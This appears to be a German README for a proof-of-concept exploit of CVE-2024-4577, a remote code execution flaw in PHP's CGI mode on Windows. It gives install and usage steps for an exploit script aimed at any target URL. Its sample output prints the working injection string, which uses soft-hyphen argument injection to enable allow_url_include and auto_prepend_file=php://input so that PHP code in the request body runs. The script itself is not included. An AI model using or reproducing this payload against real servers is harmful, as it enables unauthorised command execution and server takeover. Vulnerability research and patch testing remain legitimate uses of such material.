
Proof-of-Concept RCE-Exploit für eine kritische Sicherheitslücke in PHP <8.2.15 (Windows), die es Angreifern ermöglicht, beliebige Befehle auszuführen.
Eine schwerwiegende Sicherheitslücke in PHP’s CGI-Modus ermöglicht es Angreifern, beliebige Befehle durch Manipulation von URL-Parametern auszuführen.
Stellen Sie vor der Ausführung des Skripts sicher, dass Python 3 auf Ihrem System installiert ist. Außerdem benötigen Sie die Bibliothek requests für die Handhabung von HTTP-Anfragen.
Sie können die erforderlichen Abhängigkeiten mit pip installieren. Falls pip nicht installiert ist, folgen Sie den Anweisungen hier.
requests zu installieren:pip install requests
Um eine Ziel-URL auf die Schwachstelle CVE-2024-4577 zu überprüfen, gehen Sie wie folgt vor:
python3 exploit.py <target>
Zum Beispiel, um die URL http://example.com zu testen, führen Sie aus:
python3 exploit.py http://example.com
Das Skript testet die angegebene Ziel-URL auf die Schwachstelle und gibt die Ergebnisse in der Konsole aus. Es zeigt an, ob eine potenzielle Schwachstelle gefunden wurde oder nicht.
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include
Diese Schwachstelle wurde von Orange Tsai (@orange_8361) entdeckt.